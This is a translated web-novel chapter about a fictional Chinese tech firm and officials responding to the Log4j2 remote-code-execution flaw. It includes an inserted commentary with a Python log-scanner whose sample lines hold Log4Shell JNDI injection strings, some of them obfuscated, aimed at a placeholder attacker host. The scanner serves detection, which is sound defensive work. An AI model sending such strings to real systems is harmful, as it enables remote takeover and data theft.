"How is it? Are our losses heavy?" Wen Liang's expression was calm, and so was his mind.
It was right to take the matter seriously, but what had happened had happened and had to be accepted either way. There was no need to tie himself in knots; face it, and it would pass.
Li Ze's hearty laughter came through the receiver: "Don't worry, so far our losses are zero!"
"Hm?"
"Curious?"
"Of course. The news Lao Miaotou gave me was serious enough that even he knew about it..."
"I see!"
As he spoke, Li Ze suppressed his smile: "I knew you had people around you, and the investigation took a lot of time, so I didn't rush to contact you. Judging from the current situation, it's certain that the impact on us will be minimal, negligible even."
Then Li Ze explained the situation in detail: "Of all our external-facing service systems, only the earliest ones used this log component, back when Apache had just released it. Later we abandoned it because of its open-source nature."
"Among other things, because we spent a great deal of effort on independent development of the Star Cloud system, almost all third-party open-source components served only as references and were never incorporated into the official release, so enterprise-grade external products such as Star Cloud services are unaffected."
"And the Star service system, which is now gradually entering pilot operation, introduces hardly any third-party open-source components."
"On the other hand, because the Star system was developed completely independently, the definitions of some modules are entirely different from current mainstream systems. For example, a large share of the command lines, and even the way parameters are passed, that suit other platforms differ from ours at the definition level... This was to avoid all sorts of patent infringement risks."
"In short, thanks to the compliance and autonomy you insisted on at the beginning, all our independent platforms had a very hard time early on and had to build a new system from scratch, but it's precisely because of this that they are uniquely safe."
After saying this, Li Ze changed the subject: "According to feedback from the cybersecurity team under the group's network security and user privacy department, this vulnerability was submitted to Apache by Alibaba Cloud. According to reliable information, Apache has begun testing a patch. It won't be released the same day."
"After extensive analysis, the company's relevant staff have assessed the scope of impact of this log component vulnerability as beyond 'very serious'. It is estimated to be the most serious computer vulnerability discovered in recent years!"
"The threshold for attack is unimaginably low, and the operating permissions an attacker can gain by exploiting it are unlimited! And according to incomplete statistics, almost all Java frameworks use this log component; such a wide range of use is also rare."
After listening to Li Ze's brief description, Wen Liang laughed: "Get ready. Alibaba is about to be in serious trouble."
"What do you mean?" Li Ze was neither anxious nor excited; his tone even turned serious.
Wen Liang answered patiently: "Alibaba Cloud discovered the vulnerability and reported it to Apache, the upstream development organization. If it had merely given Apache priority and then, in follow-up exchanges, shared the vulnerability's scope with the relevant authorities, including the Ministry of Industry and Information Technology, that would have been fine;
But Alibaba Cloud did not. It didn't share when it discovered the vulnerability, it didn't share after learning how serious the situation was, and even after the Ministry found the vulnerability on its own, it still said nothing...
Yet the vulnerability's impact is broad, the threshold for attack is low, and attacks are everywhere. At such a critical moment, if they don't suffer for it, who will?"
Li Ze quickly grasped the key point: "As I recall, the relevant units' procedures for this aren't very clear, and Alibaba Cloud is an ordinary enterprise. Couldn't they find an excuse?"
Wen Liang asked back: "Given its current trajectory, how broad do you think Alibaba Cloud's business is?"
"I understand." Li Ze grew excited. "I'll prepare well; just wait and watch the show. Early on we couldn't obtain patent licenses, and later we couldn't obtain new ones because of artificial restrictions from America. Every penny we spent on R&D will be earned back in the near future!"
Wen Liang was very calm: "Don't step forward first. Wait for the Ministry's announcement, and don't notify your friends in business. When they can be informed, someone will notify them. Let's not meddle in other people's affairs."
Li Ze agreed.
After ending the call, Wen Liang flipped through his phone and checked a company email copied to him a few minutes earlier. It briefly described the cause, consequences and scope of a vulnerability in a component called Log4j2.
The technical analysis had not been abbreviated just because the recipient might not be technically savvy.
Bolang's internal processes had their rules. It wasn't that confusing material never existed, but anyone with a brain wouldn't copy confusing material to Wen Liang and the other senior executives.
Wen Liang and the others might not understand technology, but in a company as big as Bolang, could they really not find anyone who did?
And anyone in the broader technical departments who brought their brains to work ought to know that the two chief technical engineers who often appeared at the company were members of the founding team.
One is Li Bowen and the other is Sun Baoyin.
Not to mention that Zhang Yulin, another founding member, was chief engineer of the self-developed operating system... Trying to bluff them with technical content would end worse than simply resigning.
In fact, if Wen Liang were asked to write code he really couldn't, but ask him to look over the principles of a technical process... well, judge for yourself whether he could follow it.
These things are indeed hazy without a reference point, but with real content in front of you they connect easily.
After three minutes of flipping through it, Wen Liang sighed: "This is all a flaw of inertial thinking. If I'd still been in a technical role back then, I might have found this thing myself..."
"Daring to believe that human input is correct every single time... tsk, tsk, tsk..."
He really wasn't bragging.
There is a reason Li Ze said the attack threshold of this vulnerability was so low. It takes nothing more than a crafted piece of input... for example, a short lookup string placed in a request URL or header that the server is going to log... and the logging component itself, instead of treating it as plain text, resolves the lookup, reaches out to whatever address the string names and loads what comes back.
The machine that was accessed, or even the whole local area network behind it, can then be made to execute arbitrary preset content, and arbitrary really means arbitrary.
Reading files and the like is child's play.
The Log4j2 log component is very powerful, but unfortunately its checks on the various parameters are not rigorous: it treats the content of a log message with the same trust as its own configuration.
In short, with the modular thinking Wen Liang used when he wrote code, it is easy to see that the judgment conditions defined in the component's native code are not rigorous.
So... Alibaba Cloud's later defense, that it didn't know how serious the vulnerability was at the start, is a public relations line.
It has nothing to do with technology at all.
It's just that inside Alibaba... things are really a bit of a mess.
Not only did upper management have no such thoughts, even the technical staff may not have thought of notifying the domestic authorities to head off the network security risk.
As will become clear later, this was a very low-level but very serious mistake.
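The chapter describes the mechanism but never shows it, so here is an added example; it is not code from the novel or from any product the novel names. In the real-world vulnerability this scene dramatizes (Log4Shell, CVE-2021-44228 in Apache Log4j2 2.0-beta9 through 2.14.1), any logged string containing a `${jndi:...}` lookup made the library itself connect to the named LDAP or RMI server and load what came back. The script models the part of that behaviour that matters for detection: Log4j2 resolves nested lookups innermost-first, matches the lookup prefix case-insensitively, and substitutes the `:-` default when a lookup yields nothing, which is exactly what probe traffic used to hide the word jndi. It applies those rules to constructed access-log lines (the IP addresses, timestamps and attacker.example hosts are made up) without performing any real lookup, then flags the lines that still carry a JNDI lookup. The function names and sample data are my own assumptions.

```python
import re

# Constructed sample web-server access-log lines (not real captures). The last
# field is the User-Agent, which a Java application would typically hand to
# Log4j2 unchanged; hostnames such as attacker.example are placeholders.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:13:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:13:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:13:02:44 +0000] "GET /login HTTP/1.1" 404 0 "-" "${${lower:j}${upper:n}di:${lower:l}dap://attacker.example/b}"',
    '10.0.0.11 - - [10/Dec/2021:13:03:10 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NOPE:-j}ndi:rmi://attacker.example/c}"',
    '10.0.0.13 - - [10/Dec/2021:13:03:52 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/d}"',
    '10.0.0.15 - - [10/Dec/2021:13:04:00 +0000] "GET / HTTP/1.1" 200 512 "-" "build=${date:yyyy} ok"',
]

# An innermost ${...} lookup: a body containing no nested '$', '{' or '}'.
LOOKUP_RE = re.compile(r"\$\{([^${}]*)\}")
# Marker for a lookup we deliberately leave unresolved (jndi, date, unknown).
FROZEN = "\x01{"


def _resolve_one(body):
    """Resolve one innermost Log4j2-style lookup body such as 'lower:J',
    'env:NOPE:-j' or 'jndi:ldap://host/x'.

    This mirrors the two facts that make obfuscation work against vulnerable
    Log4j2: the prefix is matched case-insensitively, and ':-' introduces a
    default that is substituted when the lookup itself yields nothing.
    Only pure text transformations are evaluated here; anything that would
    touch the environment, the JVM or the network is frozen, never executed.
    """
    if ":-" in body:
        expr, default = body.split(":-", 1)
    else:
        expr, default = body, None
    prefix, _, key = expr.partition(":")
    prefix = prefix.lower()
    if prefix == "lower":
        return key.lower()
    if prefix == "upper":
        return key.upper()
    if default is not None:
        # env:/sys:/main:... with a fallback: probes pick names that do not
        # exist, so the default is what Log4j2 would have substituted.
        return default
    return FROZEN + body + "}"


def normalize_lookups(text, max_steps=256):
    """Collapse nested lookups the way Log4j2 did before choosing which lookup
    to run, leaving the dangerous ones in place so they can be inspected."""
    for _ in range(max_steps):
        m = LOOKUP_RE.search(text)
        if m is None:
            break
        text = text[: m.start()] + _resolve_one(m.group(1)) + text[m.end():]
    return text.replace(FROZEN, "${")


JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def scan_log(lines):
    """Return (line_number, normalized_line) for every line that, after
    lookup normalization, still contains a ${jndi:...} lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize_lookups(line)
        if JNDI_RE.search(norm):
            hits.append((n, norm))
    return hits


if __name__ == "__main__":
    for n, norm in scan_log(SAMPLE_LOG_LINES):
        print(f"line {n}: {norm}")
```

Run as a script, it lists lines 2 through 5 and leaves the plain browser line and the harmless `${date:...}` line alone. The normalizer is safe to run over hostile input precisely because it does the opposite of the vulnerable library: it evaluates only string transforms and refuses to contact anything. The real fix was to upgrade; Log4j2 2.16.0 removed lookups from log messages and disabled JNDI by default, which is the narrator's point in code form, since the flaw was treating logged user input as trusted template text.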
…………
At around 8 in the evening, Wen Liang had just returned to the hotel where he was staying when, over on Lao Miaotou's side, his secretary was summoned to Lao Miaotou's home.
An engineering supervisor came with the secretary, someone who had personally taken part in handling this serious vulnerability.
The old man's face was gentle and refined, his posture dignified and imposing; he looked every inch the important man, unlike the casual air he had worn half an hour earlier.
Even his hair, a little loose before, was meticulously combed again.
The secretary had followed Lao Miaotou for several years and of course knew his temperament, so he took the initiative to report directly: "Through cooperation with neighboring units and emergency inspection and repair, the vulnerability on the main servers of all key units has been dealt with, and a simple temporary workaround has been formed."
"According to current statistics, the external-facing servers of several key units, including the defense science and industry system, show evidence of intrusion through this vulnerability, with data illegally accessed more than a thousand times in total... Some of these units have recently suffered large-scale cyberattacks suspected to be related to this vulnerability."
"A certain unit may have had confidential electronic files illegally accessed..."
After finishing the description, the secretary took a breath: "Based on preliminary joint analysis with neighboring units, the potential losses caused by this vulnerability may exceed those of Prism."
"The simplicity of this vulnerability and the depth of the attack... are really too rare. According to reliable sources, Apache will rate this vulnerability 10 points, the highest level in the CVSS Common Vulnerability Scoring System, extremely dangerous."
After finishing the report, the secretary looked at the engineering supervisor who had come with him: "For the other aspects, Engineer Lin will fill in."
Lin Gong did his part and added the key points: "After systematic analysis, the principle of this vulnerability is very simple; once discovered, its danger level is easy to judge. Under normal circumstances nobody would think of triggering it, but the trigger threshold is very low: in total, only three lines of code need to be written."
"...In addition, based on comprehensive information from neighboring units, the internal systems of key units based on the Star kernel cannot load the vulnerable log component at all and do not support the JNDI interface that triggers the vulnerability, so they cannot be attacked; the same goes for all operating system products derived from the Star kernel.
Among them, the unit's pilot of Xingchen Cloud for non-critical services likewise does not have this vulnerability."
"This vulnerability exists in all commonly used Alibaba Cloud products. So far Alibaba Cloud's maintenance engineers have neither reported the vulnerability nor implemented a temporary workaround..."
The old man couldn't help cursing inwardly: "Fuck."
He was truly speechless.
How the hell could there be such a unit!
He, such an elegant, easygoing man!
Driven to swearing.
Then Lao Miaotou made a decision: "Now that a temporary workaround has been formed and a preliminary conclusion drawn, notify a wider range of people of the risk immediately."
"A formal announcement will be made in three hours."
The secretary noted the instruction and, after some thought, offered a suggestion: "Should we wait until daytime tomorrow?"
Lao Miaotou rejected it flatly: "There's no need to wait any longer."
Afterwards the secretary first saw Engineer Lin out of Lao Miaotou's house, then turned back; he knew Lao Miaotou had further instructions.
Lao Miaotou arranged directly: "Convene a meeting tomorrow morning to discuss building information security risk standards and how to form a permanent information security prevention organization."
"Should the decision on punishing Alibaba Cloud be reflected in the announcement?" the secretary asked specifically.
Lao Miaotou shook his head: "We'll decide after everyone has discussed it."
Finally he said: "Tell Wen Liang how Xingchen and Xingchen Cloud performed."
The secretary nodded again.
…………
A little later, Wen Liang received the message.
Wen Liang notified Li Ze again, telling him to be ready to move at any time.
And so, because of one vulnerability, the technical support departments of countless internet and IT companies across the country were all busy in the middle of the night.
Damage might already have been done, but precisely because of that, every minute had to be seized to deal with the vulnerability quickly and avoid new losses.
One intruder getting in is bad enough; that's no reason to let ten more follow.
Then, at around 11 at night, the Cybersecurity Administration under the Ministry of Industry and Information Technology issued a work update.
"Cybersecurity Risk Notice Regarding a Major Security Vulnerability in the Apache Log4j2 Component"
The announcement content states:
"The Apache Log4j2 component is an open-source logging framework based on the Java language and is widely used in business system development. Recently, Alibaba Cloud Computing Co., Ltd. discovered that the Apache Log4j2 component has a remote code execution vulnerability and reported the vulnerability to the Apache Software Foundation...
On October 25, cybersecurity staff discovered the serious security vulnerability in the Apache Log4j2 component during routine inspection, and have carried out vulnerability risk analysis, investigation and remediation...
This vulnerability may allow remote control of the device, which may lead to theft of sensitive information, interruption of device services and other serious harm. It is a high-risk vulnerability...
In order to reduce cybersecurity risks, relevant units and the public are reminded to pay close attention to the release of the official patch for the Apache Log4j2 component vulnerability; a temporary solution is hereby released.
The Cybersecurity Administration will continue to organize and carry out vulnerability handling work to prevent the risk of security vulnerabilities in network products and maintain the security of the public internet..."
The late-night announcement naturally reached various circles quickly.
It also spread widely in no time.
It triggered all kinds of discussion among night-owl netizens out for gossip.
Soon, programmers, who were always good at staying up late, began voicing their concern about the incident through various channels.
Netizens chatted away lively.
"The Ministry's response was really fast this time, and a temporary solution was actually completed already. A bit surprising."
"I'm a liberal arts student who doesn't understand this stuff, but I found an interesting point in the announcement. This vulnerability was discovered by Alibaba Cloud, but it only notified Apache and not the cybersecurity authorities; the cybersecurity authorities found it on their own. Does anyone know how big the impact of this vulnerability is?"
Being bald is my dignity as a strong man: "I just read the temporary solution and the vulnerability details. How should I put the scope of impact... As long as a machine is connected to the network and uses this component, its underwear can be seen. As far as I know, Log4j2 is a logging component project that Apache launched last year; its purpose was to compete with Slf4j, the new work by the author who joined Apache, developed Log4j, and then left Apache... In short, since the Apache web server under the Apache organization is the world's number one web server... you can imagine Log4j2's scope of use."
Staying up late is my protective coloring: "I can only say I broke out in a cold sweat. I feel a bit done for anyway."
Every hair sacrificed gives skill +1: "I discovered something interesting: Bolang may be the biggest winner from this vulnerability. Out of curiosity I just set up a self-built environment to reproduce it; since I also like new things, I have a Xinghai workstation... When I tried to set up the environment, I found that the Xingchen desktop system doesn't support this log component at all. The official documentation has its own log component, and it doesn't support the JNDI interface; interestingly, I then opened 'Xingchen Lingjing' to run Windows, successfully reproduced the vulnerability, and carried out the attack... Fortunately 'Xingchen Lingjing' runs in a special sandbox mode: through the attack you can freely manipulate anything in the running Windows system, including reading files, but it won't affect the host Xingchen desktop. In other words, no matter what you do, Star systems are not affected by this ultra-rare and dangerous vulnerability."
I'm a player who can't sleep at night so I eat melons: "6666, there's such an operation? Doesn't that mean the Star System is currently the safest system in the world?"
"I think I've finally found a way to fight back against everyone online who criticized Bolang for reinventing the wheel!!!"